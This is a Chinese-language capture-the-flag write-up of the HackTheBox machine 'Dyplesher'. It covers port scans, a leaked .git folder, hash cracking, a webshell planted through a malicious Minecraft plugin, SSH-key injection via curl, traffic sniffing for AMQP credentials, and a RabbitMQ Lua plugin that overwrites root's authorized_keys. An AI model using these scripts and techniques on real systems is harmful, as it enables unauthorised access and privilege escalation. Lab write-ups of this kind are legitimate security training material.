基本信息

端口扫描

需要全端口扫描,一些非常见端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
$ nmap -p- 10.10.10.190
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 10:47 CST
Nmap scan report for 10.10.10.190
Host is up (0.074s latency).
Not shown: 65525 filtered ports
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
3000/tcp  open   ppp
4369/tcp  open   epmd
5672/tcp  open   amqp
11211/tcp open   memcache
25562/tcp open   unknown
25565/tcp open   minecraft
25572/tcp closed unknown
25672/tcp open   unknown

Nmap done: 1 IP address (1 host up) scanned in 123.48 seconds

$ nmap -p 22,80,3000,4369,5672,11211,25562,25565,25672 -sC -sV 10.10.10.190
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 10:51 CST
Nmap scan report for 10.10.10.190
Host is up (0.070s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:ca:81:78:ec:27:8f:50:60:db:79:cf:97:f7:05:c0 (RSA)
|   256 e0:d7:c7:9f:f2:7f:64:0d:40:29:18:e1:a1:a0:37:5e (ECDSA)
|_  256 9f:b2:4c:5c:de:44:09:14:ce:4f:57:62:0b:f9:71:81 (ED25519)
80/tcp    open  http       Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyplesher
3000/tcp  open  ppp?
| fingerprint-strings:
|   GenericLines, Help:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=aa0f12ef62403659; Path=/; HttpOnly
|     Set-Cookie: _csrf=n-2YIlY7SbOlxR8DIWAGFqksLx46MTU5OTEwMTUzMjU4MTk0NDM3OQ%3D%3D; Path=/; Expires=Fri, 04 Sep 2020 02:52:12 GMT; HttpOnly
|     Date: Thu, 03 Sep 2020 02:52:12 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|     <meta name="_csrf" content="n-2YIlY7SbOlxR8DIWAGFqksLx46MTU5OTEwMTUzMjU4MTk0NDM3OQ==" />
|     <meta name="_suburl" content="" />
|     <meta proper
|   HTTPOptions:
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=5bfa0fdb8aa700c9; Path=/; HttpOnly
|     Set-Cookie: _csrf=5zmuGpvQgkVMtQVmWAiCCB5pdoU6MTU5OTEwMTUzNzk5MzMzNDg5Mw%3D%3D; Path=/; Expires=Fri, 04 Sep 2020 02:52:17 GMT; HttpOnly
|     Date: Thu, 03 Sep 2020 02:52:17 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|     <meta name="_csrf" content="5zmuGpvQgkVMtQVmWAiCCB5pdoU6MTU5OTEwMTUzNzk5MzMzNDg5Mw==" />
|     <meta name="_suburl" content="" />
|_    <meta
4369/tcp  open  epmd       Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|_    rabbit: 25672
5672/tcp  open  amqp       RabbitMQ 3.7.8 (0-9)
| amqp-info:
|   capabilities:
|     publisher_confirms: YES
|     exchange_exchange_bindings: YES
|     basic.nack: YES
|     consumer_cancel_notify: YES
|     connection.blocked: YES
|     consumer_priorities: YES
|     authentication_failure_close: YES
|     per_consumer_qos: YES
|     direct_reply_to: YES
|   cluster_name: rabbit@dyplesher
|   copyright: Copyright (C) 2007-2018 Pivotal Software, Inc.
|   information: Licensed under the MPL.  See http://www.rabbitmq.com/
|   platform: Erlang/OTP 22.0.7
|   product: RabbitMQ
|   version: 3.7.8
|   mechanisms: PLAIN AMQPLAIN
|_  locales: en_US
11211/tcp open  memcache?
25562/tcp open  unknown
25565/tcp open  minecraft?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPSearchReq, LPDString, SIPOptions, SSLSessionReq, TLSSessionReq, afp, ms-sql-s, oracle-tns:
|     '{"text":"Unsupported protocol version"}
|   NotesRPC:
|     q{"text":"Unsupported protocol version 0, please use one of these versions:
|_    1.8.x, 1.9.x, 1.10.x, 1.11.x, 1.12.x"}
25672/tcp open  unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.80%I=7%D=9/3%Time=5F505A5C%P=x86_64-apple-darwin18.6.0
SF:%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(GetRequest,2063,"HTTP/1\.0\x20200\x20OK\r\nContent-T
SF:ype:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Pa
SF:th=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=aa0f12ef62403
SF:659;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=n-2YIlY7SbOlxR8DIWA
SF:GFqksLx46MTU5OTEwMTUzMjU4MTk0NDM3OQ%3D%3D;\x20Path=/;\x20Expires=Fri,\x
SF:2004\x20Sep\x202020\x2002:52:12\x20GMT;\x20HttpOnly\r\nDate:\x20Thu,\x2
SF:003\x20Sep\x202020\x2002:52:12\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>
SF:\n<head\x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x2
SF:0content=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\
SF:"X-UA-Compatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"au
SF:thor\"\x20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20
SF:content=\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\
SF:"\x20/>\n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20sel
SF:f-hosted,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-
SF:referrer\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"n-2YIlY7SbOlxR
SF:8DIWAGFqksLx46MTU5OTEwMTUzMjU4MTk0NDM3OQ==\"\x20/>\n\t<meta\x20name=\"_
SF:suburl\"\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta\x20proper")%r(Hel
SF:p,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain
SF:;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request
SF:")%r(HTTPOptions,189F,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type
SF::\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=
SF:/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gogs=5bfa0fdb8aa700c9
SF:;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=5zmuGpvQgkVMtQVmWAiCCB
SF:5pdoU6MTU5OTEwMTUzNzk5MzMzNDg5Mw%3D%3D;\x20Path=/;\x20Expires=Fri,\x200
SF:4\x20Sep\x202020\x2002:52:17\x20GMT;\x20HttpOnly\r\nDate:\x20Thu,\x2003
SF:\x20Sep\x202020\x2002:52:17\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head\x20data-suburl=\"\">\n\t<meta\x20http-equiv=\"Content-Type\"\x20co
SF:ntent=\"text/html;\x20charset=UTF-8\"\x20/>\n\t<meta\x20http-equiv=\"X-
SF:UA-Compatible\"\x20content=\"IE=edge\"/>\n\t\n\t\t<meta\x20name=\"autho
SF:r\"\x20content=\"Gogs\"\x20/>\n\t\t<meta\x20name=\"description\"\x20con
SF:tent=\"Gogs\x20is\x20a\x20painless\x20self-hosted\x20Git\x20service\"\x
SF:20/>\n\t\t<meta\x20name=\"keywords\"\x20content=\"go,\x20git,\x20self-h
SF:osted,\x20gogs\">\n\t\n\t<meta\x20name=\"referrer\"\x20content=\"no-ref
SF:errer\"\x20/>\n\t<meta\x20name=\"_csrf\"\x20content=\"5zmuGpvQgkVMtQVmW
SF:AiCCB5pdoU6MTU5OTEwMTUzNzk5MzMzNDg5Mw==\"\x20/>\n\t<meta\x20name=\"_sub
SF:url\"\x20content=\"\"\x20/>\n\t\n\t\n\t\n\t\t<meta");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port25565-TCP:V=7.80%I=7%D=9/3%Time=5F505A7F%P=x86_64-apple-darwin18.6.
SF:0%r(DNSVersionBindReqTCP,2A,"\)\0'{\"text\":\"Unsupported\x20protocol\x
SF:20version\"}")%r(DNSStatusRequestTCP,2A,"\)\0'{\"text\":\"Unsupported\x
SF:20protocol\x20version\"}")%r(SSLSessionReq,2A,"\)\0'{\"text\":\"Unsuppo
SF:rted\x20protocol\x20version\"}")%r(TLSSessionReq,2A,"\)\0'{\"text\":\"U
SF:nsupported\x20protocol\x20version\"}")%r(LPDString,2A,"\)\0'{\"text\":\
SF:"Unsupported\x20protocol\x20version\"}")%r(LDAPSearchReq,2A,"\)\0'{\"te
SF:xt\":\"Unsupported\x20protocol\x20version\"}")%r(SIPOptions,2A,"\)\0'{\
SF:"text\":\"Unsupported\x20protocol\x20version\"}")%r(NotesRPC,74,"s\0q{\
SF:"text\":\"Unsupported\x20protocol\x20version\x200,\x20please\x20use\x20
SF:one\x20of\x20these\x20versions:\n1\.8\.x,\x201\.9\.x,\x201\.10\.x,\x201
SF:\.11\.x,\x201\.12\.x\"}")%r(oracle-tns,2A,"\)\0'{\"text\":\"Unsupported
SF:\x20protocol\x20version\"}")%r(ms-sql-s,2A,"\)\0'{\"text\":\"Unsupporte
SF:d\x20protocol\x20version\"}")%r(afp,2A,"\)\0'{\"text\":\"Unsupported\x2
SF:0protocol\x20version\"}");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.37 seconds

80

是一个Minecraft server,前面也能看到Minecraft相关端口:

页面上给了一个test.dyplesher.htb,加host后访问

1
10.10.10.190 test.dyplesher.htb dyplesher.htb

test.dyplesher.htb

这个页面是memcache相关操作,前面也能看到有mencached相关端口:

并且很容易发现一个.git泄漏:

直接用git利用工具下载下来,得到memcached用户名密码以及相关操作代码:

1
python GitHacker.py http://test.dyplesher.htb/.git/
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
if($_GET['add'] != $_GET['val']){
	$m = new Memcached();
	$m->setOption(Memcached::OPT_BINARY_PROTOCOL, true);
	$m->setSaslAuthData("felamos", "zxcvbnm");
	$m->addServer('127.0.0.1', 11211);
	$m->add($_GET['add'], $_GET['val']);
	echo "Done!";
}
else {
	echo "its equal";
}
?>

memcached-cli

可以直接使用memcached-cli进行操作:

得到几组账号密码:

1
2
3
4
5
6
7
8
9
10
11
12
$ memcached-cli felamos:zxcvbnm@dyplesher.htb
dyplesher.htb> get username
MinatoTW
felamos
yuntao

dyplesher.htb> get password
$2a$10$5SAkMNF9fPNamlpWr.ikte0rHInGcU54tvazErpuwGPFePuI1DCJa
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK
$2a$10$zXNCus.UXtiuJE5e6lsQGefnAH3zipl.FRNySz5C4RjitiwUoalS

dyplesher.htb>

john

使用john进行破解,得到一个新密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.memcached

mommy1

Gogs

3000端口是一个Gogs:

可以使用这一组账号密码登录:

1
felamos@dyplesher.htb : mommy1

有两个repo,没什么东西:

gitlab的release里有一个repo.zip,根据readme知道是backup:

repositories

repo下载下来里面是一些bundle文件:

可以把这些bundle文件复制到一个目录,然后直接去git clone:

bundle_unpack

clone之后查看文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
$ ls -R
4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a
4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle
4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce
4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle
clone.sh
d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35
d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle

./4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a:
LICENSE   README.md src

./4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a/src:
VoteListener.py

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce:
README.md           craftbukkit-1.8.jar plugins             start.command
banned-ips.json     eula.txt            python              usercache.json
banned-players.json help.yml            sc-mqtt.jar         whitelist.json
bukkit.yml          ops.json            server.properties   world
commands.yml        permissions.yml     spigot-1.8.jar      world_the_end

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins:
LoginSecurity     LoginSecurity.jar PluginMetrics

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity:
authList   config.yml users.db

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/PluginMetrics:
config.yml

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/python:
pythonMqtt.py

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world:
data          level.dat_mcr playerdata    session.lock
level.dat     level.dat_old region        uid.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/data:
villages.dat     villages_end.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/playerdata:
18fb40a5-c8d3-4f24-9bb8-a689914fcac3.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world/region:
r.-1.0.mca r.0.0.mca

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end:
DIM1          level.dat     level.dat_old session.lock  uid.dat

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end/DIM1:
region

./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/world_the_end/DIM1/region:
r.-1.-1.mca r.-1.0.mca  r.0.-1.mca  r.0.0.mca

./6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b:
LICENSE         README.md       phpbash.min.php phpbash.php

./d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35:
LICENSE.txt   README.md     nightminer.py

users.db

1
2
3
4
5
6
7
8
9
10
$ find . -name '*.db'
./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/users.db

$ sqlite3 ./4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/users.db
SQLite version 3.30.1 2019-10-10 20:19:45
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> select * from users;
18fb40a5c8d34f249bb8a689914fcac3|$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6|7|/192.168.43.81

BCRYPT加密的密码,可以使用john破解:

1
2
3
4
5
6
7
➜  Dyplesher cat user_db.hash
$2a$10$IRgHi7pBhb9K0QBQBOzOju0PyOZhBnK4yaWjeZYdeP6oyDvCo9vc6

➜  Dyplesher sudo john --wordlist=/usr/share/wordlists/rockyou.txt user_db.hash
...
alexis1
...

这组账号密码可以用于登录主站:

1
felamos@dyplesher.htb : alexis1

Minecraft server

现在我们进入了Minecraft server的管理页面,插件上传功能是可以使用的,可以考虑通过插件来getshell

plugin

插件开发资料:

基本就是自己做一个恶意插件,写webshell到/var/www/test目录, 这是http://test.dyplesher.htb的目录

然后add plugin,之后reload plugin,reload这里需要指定插件名:

得到webshell:

然后通过webshell把公钥写到MinatoTW用户的authorized_keys里,ssh登录,但user.txt不在这个用户里:

curl.sh

1
2
3
#!/bin/bash

curl -G 'http://test.dyplesher.htb/miao.php' --data-urlencode 'cmd=echo ssh-rsa pub_key >> /home/MinatoTW/.ssh/authorized_keys'

tshark

MinatoTW在wireshark组中,可以做sniff:

1
2
3
4
tshark -i lo -F pcap -w captured_miao.pcap

# 把抓到的包下载下来分析
scp MinatoTW@dyplesher.htb:/tmp/captured_miao.pcap ./captured_miao.pcap

AMQP

流量里得到AMQP的数据,里面有几组账号密码:

1
2
3
4
yuntao : EashAnicOc3Op
MinatoTW MinatoTW@dyplesher.htb bihys1amFov
yuntao yuntao@dyplesher.htb wagthAw4ob
felamos felamos@dyplesher.htb tieb0graQueg

user flag

然后使用新密码可以su切换到felamos用户,得到user.txt

提权信息

felamos用户目录里有个yuntao目录,里面有提示信息:

yuntao用户是AMQP manager,下一步利用点,可以通过插件提权

提权 & root flag

就是通过rabbitmq加载插件,将我们的公钥写到root用户的authorized_keys中,注意插件需要在靶机上127.0.0.1加载:

登录root,读取root.txt:

rabbitmq.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
'''
  | ~~ HackTheBox ~~ |
  script to load lua plugin for queuing
  I'm not giving password find it yourself
  plugin.lua must be on the box and being served via python server on port 9999
  ref: https://pika.readthedocs.io/en/stable/modules/channel.html#id1
'''

import pika


connection = pika.BlockingConnection(
    pika.ConnectionParameters(
        '10.10.10.190',
        5672,
        credentials=pika.PlainCredentials('yuntao', 'EashAnicOc3Op')
    )
)


channel = connection.channel()
channel.basic_publish(
    exchange='plugin_data',
    routing_key='',
    body='http://127.0.0.1:9999/plugin.lua'
)
connection.close()

plugin.lua

1
2
3
file = io.open("/root/.ssh/authorized_keys", "w")
file:write("ssh-rsa pub_key")
file:close()

参考资料